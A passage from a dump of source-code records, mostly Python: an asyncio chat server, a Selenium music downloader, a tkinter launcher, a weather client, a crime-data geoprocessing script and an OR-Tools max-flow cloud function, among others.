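print(find_prefix_at_end(b'hello', b'\r\n'))    # 0 -> nothing to hold back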
从当前房间移除自身,然后添加到指定房间。\n self.leave_current_room();\n self.enter_room(room);\n\n def leave_current_room(self):\n try:\n cur_room = self.room\n except AttributeError:\n pass\n else:\n cur_room.remove(self)\n\n def enter_room(self, room):\n self.room = room\n room.add(self)\n\n def collect_incoming_data(self, data):\n # 接收客户端的数据\n self.data.append(data.decode(\"utf-8\"))\n\n def found_terminator(self):\n # 当客户端的一条数据结束时的处理\n logging.debug(\"data=%s\" % (self.data))\n line = ''.join(self.data)\n self.data = []\n try:\n self.room.handle(self, line.encode(\"utf-8\"))\n # 退出聊天室的处理\n except EndSession:\n self.handle_close()\n\n def handle_close(self):\n # 当 session 关闭时,将进入 LogoutRoom\n logging.debug(\"handle_close\")\n\n AsyncioChat.handle_close(self)\n #asynchat.async_chat.handle_close(self)\n self.enter(LogoutRoom(self.server))\n\n logging.debug(\"handle_close end\")\n\nclass CommandHandler:\n \"\"\"\n 命令处理类\n \"\"\"\n\n def unknown(self, session, cmd):\n # 响应未知命令\n # 通过 aynchat.async_chat.push 方法发送消息\n session.push(('Unknown command {} \\n'.format(cmd)).encode(\"utf-8\"))\n\n def handle(self, session, line):\n line = line.decode()\n # 命令处理\n if not line.strip():\n return\n parts = line.split(' ', 1)\n cmd = parts[0]\n try:\n line = parts[1].strip()\n except IndexError:\n line = ''\n # 通过协议代码执行相应的方法\n method = getattr(self, 'do_' + cmd, None)\n try:\n method(session, line)\n except TypeError:\n self.unknown(session, cmd)\n\nclass Room(CommandHandler):\n \"\"\"\n 包含多个用户的环境,负责基本的命令处理和广播\n \"\"\"\n\n def __init__(self, server):\n self.server = server\n self.sessions = []\n\n def add(self, session):\n # 一个用户进入房间\n self.sessions.append(session)\n\n def remove(self, session):\n # 一个用户离开房间\n self.sessions.remove(session)\n\n def broadcast(self, line):\n # 向所有的用户发送指定消息\n # 使用 asynchat.asyn_chat.push 方法发送数据\n for session in self.sessions:\n session.push(line)\n\n def do_logout(self, session, line):\n logging.debug(\"logout......\")\n # 退出房间\n raise EndSession\n\n\nclass LoginRoom(Room):\n \"\"\"\n 处理登录用户\n \"\"\"\n\n def add(self, session):\n # 用户连接成功的回应\n Room.add(self, session)\n # 使用 asynchat.asyn_chat.push 方法发送数据\n session.push(b'Connect Success')\n\n def do_login(self, session, line):\n # 用户登录逻辑\n name = line.strip()\n # 获取用户名称\n if not name:\n session.push(b'UserName Empty')\n # 检查是否有同名用户\n elif name in self.server.users:\n session.push(b'UserName Exist')\n # 用户名检查成功后,进入主聊天室\n else:\n session.name = name\n session.enter(self.server.main_room)\n\n\nclass LogoutRoom(Room):\n \"\"\"\n 处理退出用户\n \"\"\"\n\n def add(self, session):\n # 从服务器中移除\n try:\n del self.server.users[session.name]\n except KeyError:\n pass\n\n\nclass ChatRoom(Room):\n \"\"\"\n 聊天用的房间\n \"\"\"\n\n def add(self, session):\n # 广播新用户进入\n session.push(b'Login Success')\n self.broadcast((session.name + ' has entered the room.\\n').encode(\"utf-8\"))\n self.server.users[session.name] = session\n Room.add(self, session)\n\n def remove(self, session):\n # 广播用户离开\n Room.remove(self, session)\n self.broadcast((session.name + ' has left the room.\\n').encode(\"utf-8\"))\n\n def do_say(self, session, line):\n # 客户端发送消息\n self.broadcast((session.name + ': ' + line + '\\n').encode(\"utf-8\"))\n\n def do_look(self, session, line):\n # 查看在线用户\n session.push(b'Online Users:\\n')\n for other in self.sessions:\n session.push((other.name + '\\n').encode(\"utf-8\"))\n\nif __name__ == '__main__':\n try:\n loop = asyncio.get_event_loop()\n\n s = ChatServer('127.0.0.1','8000',loop)\n loop.run_until_complete(s.run_server())\n loop.run_forever()\n except 
KeyboardInterrupt:\n print(\"chat server exit\")","sub_path":"text-chat/asyncio_server_monofile.py","file_name":"asyncio_server_monofile.py","file_ext":"py","file_size_in_byte":12395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"481771185","text":"#!/usr/bin/env python3\nimport json\n\nconfig=eval(open(\"../run.json\",\"r\").read())\n\nsamples=sorted(list(config['project']['units'].keys()))\npairs=sorted(list(config['project']['pairs'].keys()))\npfamily=config['project']['pfamily']\npipeline=config['project']['pipeline']\nif pfamily==\"rnaseq\":\n qcfolder=\"QC\"\n\nD=dict()\n\nD['ProjectSummary']=dict()\nL=list()\nL.append(\"../run.json\")\nD['ProjectSummary']['include']=L\nD['QCWorkflow']=dict()\nL=list()\nL.append(\"../Reports/initialqcrnaseq.png\")\nD['QCWorkflow']['include']=L\nD['ExomeWorkflow']=dict()\nL=list()\nL.append(\"../Reports/rnaseq.png\")\nD['ExomeWorkflow']['include']=L\nD['MultiQC']=dict()\nL=list()\nL.append(\"../Reports/multiqc_report.html\")\nD['MultiQC']['include']=L\n\n\nL=list()\nfor s in samples:\n L.append(\"../rawQC/\"+s+\".R1_fastqc.html\")\n L.append(\"../rawQC/\"+s+\".R2_fastqc.html\") \n\nD['RawFastQC']=dict()\nD['RawFastQC']['include']=L\n\nwith open(config['project']['workpath']+'/Reports/report.json', 'w') as F:\n json.dump(D, F, sort_keys = True, indent = 4,ensure_ascii=False)\n\nF.close()\n\n\n","sub_path":"Results-template/Reports/make.json.py","file_name":"make.json.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"625026997","text":"\nimport os\nimport parameters\nimport stock_prediction\nimport test\nimport train\n\n\ndef main():\n while True:\n print(\"LSTM stock prediction\")\n print(\"Please, enter the index you would like to predict\")\n ind = input(\"Index: \").upper()\n ticker = ind\n if ind == 'AMD':\n print('Enter 1 if you want to train on prepared data')\n print('Enter 2 if you want to train on raw data')\n val = input('Val: ').upper()\n if val == '1':\n TRAIN_RAW = True\n else:\n TRAIN_RAW = False\n\n print(\"Enter the day which you want to predict after today (e.g. 1 means the next day)\")\n day = input(\"Day: \").upper()\n LOOKUP_STEP = day\n print(\"Starting training the model\")\n os.system(\"python train.py\")\n print(\"Training is finished. 
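The chat rooms in the record above route client commands through getattr(self, 'do_' + cmd, None); a stripped-down, runnable sketch of that dispatch pattern on its own:

class Dispatcher:
    def handle(self, line):
        cmd, _, arg = line.partition(' ')
        method = getattr(self, 'do_' + cmd, None)
        if method is None:
            return 'Unknown command {}'.format(cmd)
        return method(arg.strip())

    def do_say(self, arg):
        return 'you said: ' + arg

print(Dispatcher().handle('say hi'))  # you said: hi
print(Dispatcher().handle('nope'))    # Unknown command nope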
Enter 'test' to start testing\")\n t = input(\"\")\n if t == 'test':\n os.system(\"python test.py\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"LSTM2/LSTMPredictionMain.py","file_name":"LSTMPredictionMain.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"542834471","text":"from selenium import webdriver\nimport time\nimport json\n\nurl = \"https://www.mewpot.com/users/sign_in\"\n\nemotion = \"잔잔\"\n\noptions = webdriver.ChromeOptions()\noptions.headless = True # headless Chrome 구현(브라우저 키지 않아��� 알아서 내부적으로 돌아감)\noptions.add_argument(\"window-size=1920x1080\")\noptions.add_argument(\"user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\")\nprefs = {'download.default_directory': 'C:\\\\Users\\\\박규한\\\\Desktop\\\\MusicCrawling\\\\{}'.format(emotion)}\noptions.add_experimental_option('prefs', prefs)\nbrowser = webdriver.Chrome(options=options)\nbrowser.maximize_window()\n\nbrowser.get(url)\n\nwith open(\"information.json\") as json_file:\n json_data = json.load(json_file)\n # 로그인 정보 입력\n browser.find_element_by_class_name(\"login_input_email\").send_keys(json_data[\"id\"])\n browser.find_element_by_class_name(\"login_input_password\").send_keys(json_data[\"password\"])\n browser.find_element_by_class_name(\"login_btn\").click()\n\n# 각각의 버튼 식별하는 요소 찾기\nfree_down_selector = \"#simple-modal > div.modal-dialog > div > div.modal-body > div > div > a:nth-child(2)\"\ndown_selector = \"#simple-modal > div.modal-dialog > div > div.modal-body > a.button.blue.mb-5.medium.tag-button.pay_catnip\"\nclose_selector = \"#simple-modal > div.modal-dialog > div > div.modal-footer > button\"\n\n# emotions = [\"Smile\", \"잔잔\", \"Surprise\", \"Sad\", \"Fear\"]\n\nfor page in range(1, 3):\n url = \"https://www.mewpot.com/search/song?page={0}&situation%5B%5D={1}\".format(page, emotion)\n browser.get(url)\n time.sleep(2)\n browser.execute_script(\"window.scrollTo(0, 720)\")\n downloads = browser.find_elements_by_css_selector('td.function_cell > div > div:nth-child(3) > a > i')\n print(\"현재 페이지 :\", page)\n for download in downloads:\n download.click() # 다운로드(구름) 버튼\n time.sleep(1)\n try:\n browser.find_element_by_css_selector(free_down_selector).click() # 무료 음원 다운로드 버튼\n except(Exception):\n browser.find_element_by_css_selector(down_selector).click() # 곡 구매 버튼\n finally:\n time.sleep(1)\n browser.find_element_by_css_selector(close_selector).click() # close 버튼\n time.sleep(1)\n print(\"download !\")\n\nprint(\"download clear !\")\nbrowser.quit() # 실행종료\n\n\n\n\n\n\n\n","sub_path":"BGM.py","file_name":"BGM.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"477264939","text":"# Исходный список содержит положительные и отрицательные числа. 
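The menu loop in the LSTM record above launches training with os.system("python train.py"), which silently ignores failures and uses whichever python is first on PATH; a hedged alternative sketch using subprocess and the current interpreter (train.py/test.py as named above):

import subprocess
import sys

def run_script(name):
    # sys.executable is the interpreter running this process, so the child
    # reuses the same Python/virtualenv; check=True raises if the script fails.
    subprocess.run([sys.executable, name], check=True)

# run_script('train.py')
# run_script('test.py')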
Требуется положительные\n# поместить в один список, а отрицательные - в другой.\n\n\ndef divide(array):\n positive = []\n negative = []\n for i in array:\n if i > 0:\n positive.append(i)\n elif i < 0:\n negative.append(i)\n return positive, negative\n \n \narr = [1, 2, 3, 4, 5, 6, 11, -1, -2, -3, -7, -20, -22]\npos, neg = divide(arr)\nprint(pos)\nprint(neg)","sub_path":"Desktop/bootcamp/week2/practice/tuesday/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"536071990","text":"import os\nimport tkinter as tk\n\ndef sortir():\n global root\n root.destroy()\n\ndef launch_0():\n global debug\n sortir()\n d = \"\" if debug.get()==0 else \" debug\"\n os.system(\"python notreAscenseur.py 0\"+d)\n\ndef launch_1():\n global debug\n sortir()\n d = \"\" if debug.get()==0 else \" debug\"\n os.system(\"python notreAscenseur.py 1\"+d)\n\ndef launch_2():\n global debug\n sortir()\n d = \"\" if debug.get()==0 else \" debug\"\n os.system(\"python notreAscenseur.py 2\"+d)\n\ndef launch_3():\n global debug\n sortir()\n d = \"\" if debug.get()==0 else \" debug\"\n os.system(\"python notreAscenseur.py 3\"+d)\n\ndef launch_4():\n sortir()\n global debug\n d = \"\" if debug.get()==0 else \" debug\"\n os.system(\"python notreAscenseur.py 4\"+d)\n\ndef launch_5():\n global debug\n sortir()\n d = \"\" if debug.get()==0 else \" debug\"\n os.system(\"python notreAscenseur.py 5\"+d)\n\ndef launch_6():\n global debug\n sortir()\n d = \"\" if debug.get()==0 else \" debug\"\n os.system(\"python notreAscenseur.py 6\"+d)\n\ndef top_frame(root):\n frame = tk.Frame(root)\n button = tk.Button(frame, text=\"Fonctionnement normal\", command=launch_0, activebackground=\"grey\",height=2)\n button.pack(fill=\"both\")\n frame.pack(side=\"top\",fill=\"both\")\n\ndef middle_frame(root):\n frame = tk.Frame(root)\n frame2 = tk.Frame(root)\n frame3 = tk.Frame(root)\n\n button1 = tk.Button(frame, text=\"Bug n°1\", command=launch_1, activebackground=\"grey\",height=2,width=20)\n button2 = tk.Button(frame, text=\"Bug n°2\", command=launch_2, activebackground=\"grey\",height=2,width=20)\n button1.pack(side=\"left\")\n button2.pack(side=\"left\")\n frame.pack(side=\"top\")\n\n button3 = tk.Button(frame2, text=\"Bug n°3\", command=launch_3, activebackground=\"grey\",height=2,width=20)\n button4 = tk.Button(frame2, text=\"Bug n°4\", command=launch_4, activebackground=\"grey\",height=2,width=20)\n button3.pack(fill=\"both\",side=\"left\")\n button4.pack(fill=\"both\",side=\"left\")\n frame2.pack(side=\"top\")\n\n button5 = tk.Button(frame3, text=\"Bug n°5\", command=launch_5, activebackground=\"grey\",height=2,width=20)\n button6 = tk.Button(frame3, text=\"Bug n°6\", command=launch_6, activebackground=\"grey\",height=2,width=20)\n button5.pack(side=\"left\")\n button6.pack(side=\"right\")\n frame3.pack(side=\"top\")\n\ndef lower_frame(root):\n global debug\n frame= tk.Frame(root)\n debug = tk.IntVar()\n c1 = tk.Checkbutton(frame, text='Activer fenêtre de déboguage',variable=debug, onvalue=1, offvalue=0)\n c1.pack()\n frame.pack()\n\n\n\ndef main():\n global root\n root = tk.Tk()\n root.protocol(\"WM_DELETE_WINDOW\", sortir)\n root.title(\"Simulation Ascenseur\")\n root.geometry(\"300x200+500+200\")\n root.description=\"Lancement simulation ascenseur\"\n root.iconbitmap(\"elevator.ico\")\n\n top_frame(root)\n middle_frame(root)\n lower_frame(root)\n\n\n\n\n\n\n\n root.mainloop()\n\n\n\nif __name__ == '__main__':\n 
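The seven near-identical launch_N functions in the tkinter launcher above differ only in the scenario number; a sketch of collapsing them with functools.partial (same command line and shutdown behaviour as the original, with debug being the IntVar from the checkbox):

import os
from functools import partial

def launch(n, debug_var, root):
    root.destroy()
    d = ' debug' if debug_var.get() else ''
    os.system('python notreAscenseur.py {}{}'.format(n, d))

# When building each button, bind its number once instead of writing a function per bug:
# button = tk.Button(frame, text='Bug n°%d' % n, command=partial(launch, n, debug, root))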
main()\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"226846370","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\n\nfrom xy.device import Device\nfrom time import sleep\n\nfrom numpy.random import random\nfrom numpy import floor\n\n\nPENUP = 140\nPENDOWN = 160\nXMAX = 150\nYMAX = 150\nTTY = '/dev/ttyUSB0'\n\n\n\ndef main():\n\n with Device(\n TTY,\n penup=PENUP,\n pendown=PENDOWN,\n verbose=True,\n min_delay=200,\n max_delay=1200\n ) as device:\n\n device.penup()\n device.move(floor(random()*XMAX),floor(random()*YMAX), fast=True)\n\n device.pendown()\n device.move(floor(random()*XMAX),floor(random()*YMAX), fast=False)\n device.penup()\n\n device.move(floor(random()*XMAX),floor(random()*YMAX), fast=True)\n\n device.pendown()\n device.move(floor(random()*XMAX),floor(random()*YMAX), fast=False)\n device.penup()\n\n device.move(0,0,fast=True)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"317562550","text":"from .rest import HTTPClient\nfrom gc import collect\nfrom urllib.parse import unquote, quote\nfrom re import search\n\nclass Client:\n __slots__ = ('http',)\n\n def __init__(self, session=None, format: str = 'C', locale: str = 'en-US', max_cache_size: int = 15):\n if format.upper() not in ('C', 'F'):\n raise TypeError('Invalid format.')\n \n self.http = HTTPClient(max_cache_size, format, locale, session)\n\n @property\n def format(self) -> str:\n return search('&weadegreetype=([^&]+)', self.http._query_params)[0][15:]\n\n @format.setter\n def format(self, value: str) -> None:\n if value.upper() not in ('C', 'F'):\n raise TypeError('Invalid format.')\n self.http._query_params = self.http._query_params.replace(f'&weadegreetype={self.format}', f'&weadegreetype={value}')\n\n @property\n def locale(self) -> str:\n return unquote(search('&culture=([^&]+)', self.http._query_params))[0][9:]\n\n @locale.setter\n def locale(self, value: str) -> None:\n self.http._query_params = self.http._query_params.replace(f'&culture={self.locale}', f'&culture={quote(value)}')\n\n async def find(self, location: str) -> \"Weather\":\n \"\"\" Finds a weather forecast from a location. \"\"\"\n if (not location) or (not isinstance(location, str)):\n raise TypeError('location must be a string.')\n return await self.http.request(location)\n\n @property\n def cache(self) -> \"Cache\":\n \"\"\" Returns the cache. \"\"\"\n if self.closed:\n return\n return self.http.cache\n \n @cache.setter\n def cache(self, new_cache: dict) -> None:\n \"\"\" Modifies the cache. \"\"\"\n if self.closed:\n return\n elif new_cache is None:\n return self.cache.clear()\n elif not isinstance(new_cache, dict):\n raise TypeError('Invalid type for setting the client\\'s cache.')\n\n new_is_empty = not len(new_cache.keys())\n for k, v in new_cache.items():\n self.http.cache[k] = v\n \n if new_is_empty:\n collect()\n\n @property\n def closed(self) -> bool:\n \"\"\" Returns if the client is closed or not. \"\"\"\n return self.http.closed\n\n async def close(self) -> None:\n \"\"\" Closes the wrapper. 
\"\"\"\n if not self.closed:\n await self.http.close()\n\n def __repr__(self) -> str:\n return f\"\"","sub_path":"python_weather/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"194797422","text":"from pandas import *\nimport numpy as num\nfrom pysal import *\nimport os, glob\nfrom osgeo import ogr\nimport csv\nfrom pyGDsandbox.dataIO import df2dbf, dbf2df\nimport uuid\nfrom pyproj import Proj, transform\nfrom shapely.geometry import Polygon, shape\nfrom osgeo import ogr, osr\nimport fiona\n\n#read in data from geodatabase\ndriver = ogr.GetDriverByName(\"ESRI Shapefile\")\nnormanlist = glob.glob('*****.dbf')\nnorman=glob.glob('*****.shp')\n\nnlist = []\nfor m,n in zip(normanlist, range(len(normanlist))):\n\ta=normanlist[n].rfind(\"Incidents\")\n\tb=normanlist[n].rfind(\".dbf\")\n\tnlist.append(m[a:b])\n\ntable1=read_excel('*****.xls', 'Sheet1', index_col=None, na_values=['NA']).fillna(0)\n\n\nfor x, y, z in zip(normanlist, nlist, norman):\n\tdb= pysal.open(x, 'r')\n\td = {col: db.by_col(col) for col in db.header}\n\ttable1=DataFrame(d).fillna(0)\n\twgs84X=[]\n\twgs84Y=[]\n\tinproj=Proj(\"+proj=lcc +lat_1=33.93333333333333 +lat_2=35.23333333333333 +lat_0=33.33333333333334 +lon_0=-98 +x_0=600000.0000000001 +y_0=0 +ellps=GRS80 +datum=NAD83 +to_meter=0.3048006096012192 +no_defs\", preserve_units = True)\n\toutProj = Proj('+proj=utm +zone=15 +ellps=WGS84 +datum=WGS84 +units=m +no_defs ', preserve_units = True)\n\tfor pol in fiona.open(z):\n\t\tif str(type(pol['geometry']))==\"\":\n\t\t\twgs84X.append(0)\n\t\t\twgs84Y.append(0)\n\t\telse:\n\t\t\tmyX=pol['geometry']['coordinates'][0]\n\t\t\tmyY=pol['geometry']['coordinates'][1]\n\t\t\ta=transform(inproj,outProj,myX, myY)\n\t\t\twgs84X.append(a[0])\n\t\t\twgs84Y.append(a[1])\n\n\t\n\tnewtable1=DataFrame({})\n\tnewtable1[\"incid\"] = table1[\"incident_n\"]\n\tnewtable1[\"Reported_address\"]=num.nan\n\t#newtable1[\"incid\"] = Series(range(1, len(newtable2)+1)).unique()\n\t#newtable1[\"Location_name\"]=num.nan\n\t#for i in range(len(table1[\"incident_n\"])):\n\tnewtable1[\"Reported_address\"] = table1[\"CVaddress\"] #str(table1[\"CVaddress\"][i])+\",Norman,OK\"\n\tfor i in range(len(table1[\"CVaddress\"])):\n\t\tif newtable1[\"Reported_address\"][i] != '' and newtable1[\"Reported_address\"][i] != 0 and newtable1[\"Reported_address\"][i].strip().find(\"UNKNOWN\") == -1 and newtable1[\"Reported_address\"][i] != num.nan:\n\t\t\tnewtable1[\"Reported_address\"][i]=str(newtable1[\"Reported_address\"][i].strip())+\",NORMAN,OK\"\n\t\telse:\n\t\t\tnewtable1[\"Reported_address\"][i]=\"NORMAN,OK\"\n\tnewtable1[\"Incident_date\"]=num.nan\n\tnewtable1[\"Report_date\"]=num.nan\n\tnewtable1[\"Incident_time\"]=num.nan\n\tnewtable1[\"Report_time\"]=num.nan\n\t\n\tIncident_date=[0]*len(table1[\"CVaddress\"])\n\tReport_date=[0]*len(table1[\"CVaddress\"])\n\n\tfor i in range(len(table1[\"CVaddress\"])):\n\t\tIncident_date[i] = table1[\"date_1\"][i][0:10]\n\t\tReport_date[i] = table1[\"date_repor\"][i][0:10]\n\t\n\tnewtable1[\"Incident_date\"] = Incident_date\n\tnewtable1[\"Report_date\"] = Report_date\n\t\n\tIncident_time=[0]*len(table1[\"CVaddress\"])\n\tfor i in range(len(table1[\"CVaddress\"])):\n\t\tIncident_time[i] = table1[\"date_1\"][i][11:]\n\t\n\tnewtable1[\"Incident_time\"]=Incident_time\n\n\tReport_time=[0]*len(table1[\"CVaddress\"])\t\t\n\tfor i in range(len(table1[\"CVaddress\"])):\n\t\tIncident_time[i] = 
table1[\"date_repor\"][i][11:]\n\t\n\tnewtable1[\"Report_time\"]=Incident_time\n\n\tnewtable1[\"IBR\"] = table1[\"NIBRSCode\"]\n\tnewtable1[\"IBR_description\"] = table1[\"NIBRSDesc\"]\t\n\tnewtable1[\"Police_Department_Code\"]= table1[\"Offense\"]\n\tnewtable1[\"PD_description\"] = table1[\"OffenseDes\"]\n\t#if \"tiger_X\" in db.header:\n\t#\tnewtable1[\"Latitude\"] = table1[\"tiger_X\"]\n\t#\tnewtable1[\"Longitude\"] = table1[\"tiger_Y\"]\n\t#else:\n\tnewtable1[\"Latitude\"] = wgs84Y\n\tnewtable1[\"Longitude\"] = wgs84X\n\tnewtable1[\"State_Statute_Number\"]=num.nan\n\tnewtable1[\"State_Statute_Literal\"]=num.nan\n\t\n\tnewtable1[\"Global_ID\"]=num.nan\n\tnewtable1[\"flag_geocode\"]=num.nan\n\n\tReport_date=[0]*len(table1[\"CVaddress\"])\n\tIncident_date=[0]*len(table1[\"CVaddress\"])\n\tReport_time=[0]*len(table1[\"CVaddress\"])\n\tIncident_time=[0]*len(table1[\"CVaddress\"])\n\n\tfor i in range(len(newtable1[\"Global_ID\"])):\n\t\t\n\t\tReport_date[i]=str(newtable1[\"Report_date\"][i])[0:4]+\"-\"+str(newtable1[\"Report_date\"][i])[5:7]+\"-\"+str(newtable1[\"Report_date\"][i])[8:]\n\t\tIncident_date[i]=str(newtable1[\"Incident_date\"][i])[0:4]+\"-\"+str(newtable1[\"Incident_date\"][i])[5:7]+\"-\"+str(newtable1[\"Incident_date\"][i])[8:]\n\n\t\tif newtable1[\"Incident_time\"][i] != num.nan:\n\t\t\tIncident_time[i]=str(newtable1[\"Incident_time\"][i])[0:2]+\":\"+str(newtable1[\"Incident_time\"][i])[3:5]+\":\"+str(newtable1[\"Incident_time\"][i])[6:]\n\t\telse:\n\t\t\tIncident_time[i]=num.nan\n\t\tif newtable1[\"Report_time\"][i] != num.nan:\n\t\t\tReport_time[i]=str(newtable1[\"Report_time\"][i])[0:2]+\":\"+str(newtable1[\"Report_time\"][i])[3:5]+\":\"+str(newtable1[\"Report_time\"][i])[6:]\n\t\telse:\n\t\t\tReport_time[i]=num.nan\n\t\t#newtable1[\"Global ID\"][i]=str(uuid.uuid4())\n\t\n\tnewtable1[\"Report_date\"]=Report_date\n\tnewtable1[\"Incident_date\"]=Incident_date\n\tnewtable1[\"Report_time\"]=Report_time\n\tnewtable1[\"Incident_time\"]=Incident_time\n\n\tnewtable1[\"Global_ID\"]=range(len(newtable1[\"Global_ID\"]))\n\tnewtable1=newtable1.replace(0,num.nan)\n\tnewtable1=newtable1.replace(\"0\",num.nan)\n\tnewtable1=newtable1.replace(\"00\",num.nan)\n\tnewtable1=newtable1.replace(\"\",num.nan)\n\t#newtable1=newtable1.sort([\"Report_date\"])\n\t#newtable1[\"incid\"] = Series(range(1, len(newtable1)+1)).unique()\n\tnewtable1=newtable1[[\"Global_ID\", \"Reported_address\", \"Incident_date\", \"Incident_time\", \"Report_date\", \"Report_time\", \"Latitude\", \"Longitude\", \"IBR\", \"IBR_description\", \"Police_Department_Code\", \"PD_description\", \"State_Statute_Number\", \"State_Statute_Literal\",\"flag_geocode\"]]\n\tnewtable1.to_csv('*****.csv', index=False)\n\t#df2dbf(newtable1, x)\n\n","sub_path":"1norman.py","file_name":"1norman.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"453806388","text":"\"\"\"Module for maximum flows.\"\"\"\n\n\nimport functools\nimport os\n\nfrom flask import jsonify\nfrom itsdangerous import Signer\n\nfrom ortools.graph.python.max_flow import SimpleMaxFlow\n\n\ndef request_wrapper(original_func=None,\n allowed_methods=frozenset(['GET', 'PUT', 'OPTIONS', 'POST',\n 'DELETE'])):\n def _decorate(func):\n @functools.wraps(func)\n def wrapped_func(request):\n # Allowed methods\n if request.method not in allowed_methods:\n return jsonify({'status': 'error',\n 'message': 'Method not allowed',\n 'data': None}), 403\n\n # CORS\n CORS_ORIGINS = 
os.environ['CORS_ORIGINS'].split(';')\n origin = request.headers.get('origin')\n headers = {}\n if '*' in CORS_ORIGINS:\n headers['Access-Control-Allow-Origin'] = '*'\n elif origin and origin in CORS_ORIGINS:\n headers['Access-Control-Allow-Origin'] = origin\n if len(CORS_ORIGINS) > 1 and '*' not in CORS_ORIGINS:\n headers['Vary'] = 'Origin'\n\n if request.method == 'OPTIONS':\n headers = {\n **headers,\n 'Access-Control-Allow-Methods': allowed_methods,\n 'Access-Control-Allow-Headers': ['Content-Type',\n 'x-api-key'],\n 'Access-Control-Max-Age': '3600'\n }\n return ('', 204, headers)\n\n # API token\n api_key = request.headers.get('X-API-KEY')\n if api_key is None:\n return jsonify({'status': 'error',\n 'message': 'Missing \"x-api-key\" header',\n 'data': None}), 401\n\n try:\n Signer(os.environ['SECRET_KEY']).unsign(api_key)\n except Exception:\n return jsonify({'status': 'error',\n 'message': 'Invalid access token',\n 'data': None}), 401\n\n # Run function\n try:\n resp, status = func(request)\n return jsonify(resp), status, headers\n except Exception as e:\n return jsonify({'status': 'error',\n 'message': str(e),\n 'data': None}), 500, headers\n\n return wrapped_func\n\n if original_func:\n return _decorate(original_func)\n\n return _decorate\n\n\n@request_wrapper(allowed_methods=['OPTIONS', 'POST'])\ndef maximum_flows(request):\n \"\"\"Solve maximum flow optimization problem.\n\n Args:\n data (dict): Input data as defined in the endpoint.\n\n References:\n https://developers.google.com/optimization/flow/maxflow\n \"\"\"\n # Get inputs\n print('Starting maximum flow optimization...')\n data = request.get_json()['data']\n start_nodes = [arc['startNodeId'] for arc in data['arcs']]\n end_nodes = [arc['endNodeId'] for arc in data['arcs']]\n capacities = [arc['capacity'] for arc in data['arcs']]\n source_node = [n['id'] for n in data['nodes'] if n['type'] == 'Source'][0]\n sink_node = [n['id'] for n in data['nodes'] if n['type'] == 'Sink'][0]\n\n # Map nodes\n unique_nodes = set(start_nodes + end_nodes)\n node_map = dict((v, i) for i, v in enumerate(unique_nodes))\n node_inv_map = dict((i, k) for k, i in node_map.items())\n start_nodes = [node_map[n] for n in start_nodes]\n end_nodes = [node_map[n] for n in end_nodes]\n source_node = node_map[source_node]\n sink_node = node_map[sink_node]\n\n # Optimize\n max_flow = SimpleMaxFlow()\n max_flow.add_arcs_with_capacity(start_nodes, end_nodes, capacities)\n solved = max_flow.solve(source_node, sink_node)\n\n # Results\n status = 'success'\n message = None\n data = None\n if solved == max_flow.OPTIMAL:\n message = 'Optimal solution found successfully!'\n data = {}\n data['optimalFlow'] = max_flow.optimal_flow()\n data['sourceMinCut'] = [node_inv_map[i]\n for i in max_flow.get_source_side_min_cut()]\n data['sinkMinCut'] = [node_inv_map[i]\n for i in max_flow.get_sink_side_min_cut()]\n data['arcs'] = []\n for i in range(max_flow.num_arcs()):\n data['arcs'].append({\n 'startNodeId': node_inv_map[max_flow.tail(i)],\n 'endNodeId': node_inv_map[max_flow.head(i)],\n 'flow': max_flow.flow(i),\n 'capacity': max_flow.capacity(i)\n })\n else:\n message = 'No solution found'\n\n return {'status': status, 'message': message, 'data': data}, 200\n","sub_path":"functions/maximum_flows/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"443188743","text":"import csv\nimport os\nimport numpy as np\nimport json\n\n#reference taken from 
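A self-contained toy run of the same SimpleMaxFlow API the Cloud Function above wraps, on a four-node graph (the node ids and capacities are arbitrary illustration):

from ortools.graph.python.max_flow import SimpleMaxFlow

smf = SimpleMaxFlow()
# Arcs (start, end) with capacities; source is node 0, sink is node 3.
smf.add_arcs_with_capacity([0, 0, 1, 2], [1, 2, 3, 3], [3, 2, 2, 3])
if smf.solve(0, 3) == smf.OPTIMAL:
    print('max flow:', smf.optimal_flow())  # 4
    for i in range(smf.num_arcs()):
        print(smf.tail(i), '->', smf.head(i), smf.flow(i), '/', smf.capacity(i))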
